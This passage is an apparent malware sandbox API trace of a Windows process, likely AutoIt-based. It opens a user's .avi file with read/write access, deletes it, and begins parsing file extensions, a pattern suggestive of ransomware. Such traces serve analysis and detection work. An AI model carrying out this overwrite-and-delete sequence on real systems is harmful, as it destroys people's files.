Flags=0x0, Size=0x4) returned 0x8e1aa0 [0194.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0194.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0194.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0194.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0194.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0194.461] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0194.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.466] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0194.466] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\xhiatain2v.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0194.467] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0194.467] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0194.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0194.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.469] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.469] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0194.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0194.469] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.469] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.469] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0194.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0194.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0194.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0194.471] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.471] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.471] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.471] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.471] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0194.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.471] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.471] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.471] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0194.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0194.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0194.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0194.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0194.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0194.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0194.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0194.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0194.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0194.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0194.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0194.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0194.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0194.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0194.472] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.472] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.472] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.472] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi", lpFilePart=0x0) returned 0x3f [0194.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0194.472] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x954c2e20, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xbfc92110, ftLastAccessTime.dwHighDateTime=0x1d5e425, ftLastWriteTime.dwLowDateTime=0x191c64a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb330, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="xhiatAIn2v.avi", cAlternateFileName="XHIATA~1.AVI")) returned 0x90ae18 [0194.472] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\xhiatain2v.avi")) returned 1 [0194.476] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x954c2e20, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xbfc92110, ftLastAccessTime.dwHighDateTime=0x1d5e425, ftLastWriteTime.dwLowDateTime=0x191c64a0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xb330, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="xhiatAIn2v.avi", cAlternateFileName="XHIATA~1.AVI")) returned 0 [0194.476] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0194.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0194.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0194.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0194.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0194.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0194.480] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0194.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0194.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0194.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0194.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0194.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0194.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0194.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0194.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0194.482] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.482] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0194.482] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.482] CompareStringW (Locale=0x400, 